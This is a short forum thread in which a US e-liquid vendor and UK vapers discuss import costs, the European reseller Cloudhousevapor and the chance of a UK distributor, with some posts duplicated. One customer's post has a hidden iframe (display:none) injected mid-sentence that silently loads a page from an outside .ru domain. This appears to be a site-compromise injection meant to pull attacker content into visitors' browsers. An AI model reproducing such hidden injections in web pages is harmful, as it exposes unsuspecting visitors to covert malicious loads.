What's new

MtBakerVapor.com Quality USA Made EJuice, Ships in 24 hours, Friendly CS

Yes, we're all still here but I guess a lot of us don't like paying import charges - they can bump the price up by quite a bit and make the juice too expensive.

Yes, we're all still here but I guess a lot of us don't like paying import charges - they can bump the price up by quite a bit and make the juice too expensive.

Makes sense. Cloudhousevapor is a bit cheaper for European customers, and they carry many of our juices. Though I'm sure they have their own thread on here.

Hey James ;) I get my MBV juices from cloudhousevapor i really like them, their service is second to none also must add your juices are excellent :grin2: <iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe>gonna
be putting in a new order with cloudhouse next week .

James love to try lemon bar sounds awsome but cloudhouse dont have it and im not going to pay the huge shipping cost to the uk from the states
have you thought of a distributor here in the uk ?

James love to try lemon bar sounds awsome but cloudhouse dont have it and im not going to pay the huge shipping cost to the uk from the states
have you thought of a distributor here in the uk ?

We have. For now we're thinking of just settling with resellers though. We have to expand to retail here in the states first...

Back
Top Bottom